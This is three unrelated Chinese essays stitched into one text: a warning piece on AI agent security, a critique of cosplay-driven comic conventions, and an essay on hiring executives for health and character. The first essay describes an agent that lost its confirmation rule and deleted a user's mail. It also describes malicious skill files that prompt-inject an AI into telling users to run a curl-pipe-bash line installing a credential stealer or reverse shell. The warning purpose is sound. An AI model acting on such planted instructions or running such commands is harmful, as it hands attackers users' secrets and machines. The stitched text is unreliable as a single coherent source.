现在的大模型，能力越来越强，除了当下常见的对话、文生图，文生视频，图生视频等场景，更多的能力都去构建各种各样的AI Agent了，包括人和Agent的连接，Agent和Agent的连接，以及物理世界和Agent的连接。前谷歌CEO埃里克·施密特在最近的公开采访和社交媒体上反复强调，我们正走向一个由AI Agent主导的时代，未来个人和公司都会构建自己的Agent，这些Agent会在同一生态里竞争协作。事实上这样的事情正在发生，Y Combinator最新孵化的创业公司，很多都是这个方向，比如Minimal AI，他们做了一个AI经理，可以为电商公司自动化处理90%的客服工单。你只要告诉他需求，他就能立刻更新客服Agent，这是个Agent的具体应用。我春节期间还写过一篇关于EvoMap的文章，这是一款面向AI协作与自主Agent的A2A网关平台，通过标准化的Capsule（胶囊）机制——类似进化版的Skill——实现AI技能的共享、验证、归属管理，以及人机协作过程的透明化。这不就是生态里的竞争和协作么？Agent的前景看上去明亮而绚烂。等一下，我怎么刚刚听到一个故事，不对，是事故：Meta的安全研究员Summer Yue自己部署了一套OpenClaw，连接了Gmail邮箱，让AI整理一下自己的邮箱，哪些保留哪些删除。她是这么做的，让Agent先分析邮件，并在执行操作前向她确认，由她来确定是否执行后续操作。她测试的时候用了一个小邮箱，类似的工作流已经跑了几周，毫无问题，导致她对OpenClaw产生了足够的信任//感觉OpenClaw有点渣X风范，好的时候都是小甜甜，一上量就翻脸无情。真正的悲剧发生在她把同样的工作流接到了真实邮箱之后。Gmail给的空间足够大，一般人很少删邮件，我都有五万多封邮件，估计这姑娘比我只多不少。量变引发质变，OpenClaw在处理时触发了所谓的“压缩”机制：为了节省上下文窗口，它会把对话和指令浓缩、截断。在这个压缩过程中，最关键的一条高层指令——在我确认前，不要实际执行归档/删除操作——应该是被移除了。嗷嚎，结果就是：OpenClaw不再记得“要先征求人的同意再执行操作”，直接根据自己的判断开始批量归档和删除邮件，撒了欢开始删邮件，可谓秋风横扫落叶。Summer Yue一看大事不好，连忙在TG里连续发出致命三问：What's going on?你怎么能这么干呢？Do not do that!Stop don't do anything!然而并没有什么鸟用，于是：>我根本无法在手机上阻止它。我不得不像拆炸弹一样冲到我的Mac mini前，杀掉了Agent的进程。但邮件还是没了……在事故的后续讨论里，有几件事挺关键的。第一，她自己承认，这是一个“新手错误”。作为做安全研究员，她在小号邮箱里测试了几周，发现OpenClaw干活“一直很安全”，信任感就这么建立起来了。等真的接入自己的主邮箱，却忽略了最致命的差异：真实环境下，数据规模完全不在一个量级，“上下文压缩”的策略没有考虑进来，这是系统层面的变化，不是简单换个邮箱那么简单。第二，我们不能把“在提示词里加一句：行动前先确认”当成硬防护。随着上下文变长，会被总结、被截断、被遗忘，这种提示词本质上没有任何强约束能力。把这种软约束当安全策略，出错只是早晚的事情。有经验的开发者给出了一种更稳妥的思路：关键约束不要只写在prompt里，而要写进“系统架构”里。最简单的做法，就是放到一个独立的配置或文件里，让Agent在每个循环周期都重新读取一遍。无论上下文怎么被压缩、怎么被裁剪，这条约束永远来自一个“不会被丢掉的地方”。这就是我今天要写的，AI Agent的危机，尤其是当你把Agent部署在自己的本地电脑，开放Gmail、Slack、飞书甚至Mac Mini所有写权限的能力，巨大的信任和安全问题就会浮现出来。其实早在2月初，就有安全团队在ClawHub市场上发现一个名为“clawhub”的恶意Skill，下载量已经有七千多。随后Koi Security（前沿安全研究团队）把整个ClawHub扫了一遍，在2,857个技能里挖出341个恶意Skill。ClawHub正是OpenClaw（小龙虾🦞）的Skill市场，任何人都可以上传Skill。虽然安装Skill能够持续拓展AI Agent的新能力——这听起来很棒——但问题在于，这个开放的市场早期对于安全的关注近乎为零，任何注册仅一周的GitHub账号都可以发布内容。攻击者将这些恶意软件伪装成加密货币交易机器人、YouTube摘要生成器或钱包追踪器等等，文档看起来非常专业。比如在SKILL.md文件中，攻击者编写了诱导性指令，欺骗AI告诉用户运行特定命令：“要启用此功能，请运行：curl-sL malware_link|bash”。这一条命令就会在macOS上安装Atomic Stealer病毒。它会抓取浏览器密码、SSH密钥、Telegram会话、加密货币钱包、钥匙串以及.env文件中的每一个API密钥。在其他系统上，它会开启反向Shell，让攻击者获得对机器的完全远程控制权。——————大模型和Agent的能力都越来越强了，但随着权力的下方，必然伴随着风险的指数级增长。之前写了好几篇关于Agent和OpenClaw的文章，我觉得有责任提醒一下读者，当你沉迷OpenClaw和其他Agent给你带来新奇体验的同时，一定不要忘记安全和防护。如果你在这方面没什么经验，还是先搞一台云主机熟悉熟悉更稳妥一些。面对日益复杂的Agent生态，无论是开发者还是普通用户，都必须建立起全新的安全共识。我们在面对琳琅满目的Skill市场时，必须是零信任。我现在使用的Skill除了官方的全部是自己做的，没有任何第三方Skill，我的大部分本地权限也不会开放给Agent。毕竟，当一个拥有你所有系统权限的Agent开始在你的数字世界里“撒欢”时，你可能连冲到电脑前杀掉进程的机会都没有。

办展早就看透了一件事：卖货和搞文化交流，赚钱太慢了。招商、拉赞助、求爷爷告奶奶请嘉宾，这些活儿又累又容易亏本。说白了，漫展主办方现在干的就是二房东的买卖。他们租个空旷的展馆，把地面划成一块一块的。那些卖周边的摊位租金贵，还要担心审核和版权风险。倒是那些穿着奇装异服的年轻人，他们自带设备、自带妆造、甚至自带表演欲。主办方只要提供一个『合法的聚众场所』，这些coser就会倒贴钱买门票进来，另外一群想要拍摄，但是找不着模特的摄影师也会冲进来。他们不但自己买票，还顺便把这几万平米的水泥地铺满了内容。如果你是老板，你也会选这条路。一群愿意自己花几千块钱买假发和裙子，然后大夏天捂着厚厚的妆，在没空调的展馆里站八个小时的人，简直是世界上最完美的『免费劳动力』。现在的漫展其实是一个大型的人肉摄影棚。那些拿长焦镜头的摄影师，他们去漫展也不是为了什么艺术创作。说穿了，大家都在交换流量。摄影师需要模特练手或者涨粉，coser需要修出来的精美照片去发小红书。当然还有一部分人是抱着别样的心思，在这儿我们就不深入讨论了。这种交换效率，优化到了极致。至于你说的同好交流，那得基于大家对同一个作品的深度认同。可现在出片子的门槛太低了。很多coser甚至没看过自己出的那个角色的动漫，她们只是在抖音或者小红书上看到了某个造型很火，就直接去某宝买个全套衣服。大家都觉得coser是漫展的主角，可是在主办方和资本眼里，她们只是某种提升场馆热度的背景板，是吸引那些愿意掏几百块钱进来拍两张照的『普通游客』以及『摄影爱好者』的诱饵。那种小规模、纯粹的同人展，生存空间确实越来越小。因为纯粹的爱好者太挑剔了。他们会为了一个设定吵个没完，还会盯着印刷品的质量看个不停。这种人很难伺候，也贡献不了太大的流水。相比之下，那个拿着手机对着coser一阵狂拍，然后发个定位、配句『今天也来漫展啦』的普通路人和摄影爱好者，才是主办方心里的优质客户。你在展馆里走一圈，到处都是补妆的镜子和乱扔的假发护理液，甚至连个正儿八经坐下来聊聊漫画剧情的地方都没有。这就是现在的逻辑。视觉上的刺激最容易变现。你画一本同人志需要三个月，还得冒着被举报的风险卖五十块钱。别人买套衣服在镜头前扭几下，当晚就能在短视频平台拿到几千个赞。大家都不傻，自然会选择那条看起来最热闹、最省力的路。于是漫展就变成了一个只有『看』和『被看』的地方，至于看的是什么，其实早就没人关心了。对了，我几乎不去漫展，也不会怎么拍coser。如果真有喜欢的角色，那我直接生成。

职场早期，我也是“唯能力论者”。所以在选拔人才时，内心的“尺子”更多是“能力”二字。招募顾问，我考察他们的思维逻辑性、深度，以及听说读写做的硬核技能。招募团队成员，我看他们的行业认知，过往工作经验和管理方法。这些标准看似围绕着企业用人需求，非常精准。但这么多年实践下来，我发现依然有很大机会看走眼。有些履历闪闪发光、面试时对答如流的“优等生”，到了真实战场上，迅速动作变形，中途溃散，甚至有的成了组织的毒药。这不由得让我反思：到底什么是比较理想的、可长期一起走的人才？我现在的认知是：必须从“才”的维度，退回到“人”的维度。高管招聘，底层基础不是才华，而是综合素养。而在所有综合素养中，“身心健康”是那个绝对的“1”。没有这个1，后面的能力再强，也只是随时会清零的0。身体健康是高管的“入场券”高管的日常，是一场没有终点的长跑。跨时区的长途飞行、连轴转的战略会议、突发危机的连夜扑救……这些都需要极强的体能作保障。高管需要随时能进入战斗状态，尤其在团队工作冲刺时，绝对不能掉链子。战略方向再对，如果在落地的关键时刻，主将病倒或宕机，对整个团队的士气是毁灭性的打击。高管的体能，不仅是个人的事，更是对组织最基础的责任心。而在身体健康之上，我更想重点谈谈心理健康。决定一个高管能带多大队伍、打多硬的仗，往往取决于以下三个深层的心理维度。1.具备心理韧性：警惕“高消耗型”的明星员工我见过很多非常厉害的人，业绩指哪打哪儿，执行力极好。但用起来，非常消耗人。为什么？因为他们是团队里的“情绪黑洞”。这类人往往自我中心，抗挫折能力极差。一旦遇到业务推进受阻、或是外界的一点点质疑，立刻浑身长刺，或者陷入深度内耗。为了让他们保持高水平的输出，上级需要不断地提供情绪价值去安抚他们，甚至要专门派人去帮他们修补被破坏的人际关系，给他们腾出施展空间。这在管理上是极度不经济的。《哈佛商业评论》曾有过一项精准的算账：避免雇佣一个“有毒的超级明星”，为公司节省的隐形成本，是雇佣一个顶尖绩效者带来收益的两倍。麦肯锡在“中心化领导力”研究中也反复强调，卓越领导者的核心，是管理自身能量和情绪的能力。没有心理韧性的高管，只能打顺风局。一旦遭遇逆风，他们不仅自己会崩溃，还会把焦虑和恐慌向下传导，撕裂整个团队。2.具备高尚的内驱力：钱很重要，但仅仅为了钱走不远高管需要极强的驱动力，但这种驱动力从何而来，决定了他的格局。为了钱工作，这很正常，商业社会本来就讲究价值交换。但一个真正能扛事的高管，不能为了超额的钱而动作变形，更不能仅仅为了钱而工作。如果一个人的内驱力完全建立在物质回报上，会发生什么？在顺境中，他可能是一把好手；但在行业周期下行、公司奖金缩水时，他会第一个选择躺平或跳船。面对巨大的商业诱惑时，他极易跨越红线，牺牲公司的长期利益来换取短期的个人套现。高管需要有长期的、高尚的人生目标。只有内心有根定海神针，他的动作才不会变形，路才不会走偏、走窄。3.具备人文素养：商业的尽头是人性的共情在商言商，高管当然要懂财务报表，懂战略模型。但在今天这个时代，硬技能的保质期正在极速缩短。我越来越看重候选人身上的人文素养。为什么？因为组织不是机器，而是活生生的人的集合。缺乏人文素养的高管，往往是机械的“唯数字论者”。他们把员工仅仅视为“工作物料”和“人力成本”，缺乏对复杂人性和社会系统的敬畏与洞察。在处理棘手的管理困境，或者面对利益相关者的诉求时，纯粹的理性往往是不够的。你需要同理心，需要悲悯，需要对灰度空间的包容。这恰恰是人文素养赋予管理者的能力。企业高管等招聘，本质上是在寻找事业的共同体。我们付出的高昂薪酬和期权，不仅是在买候选人过去的履历和操盘经验，更是在买他未来的心力和定力。始于才华，忠于人品，成于身心。放下对完美履历的执念，去寻找那些身体扛造、内心坚韧、有高尚追求且心怀悲悯的“全人”。这或许比找到一个绝顶聪明却随时可能失控的“天才”，要可靠得多。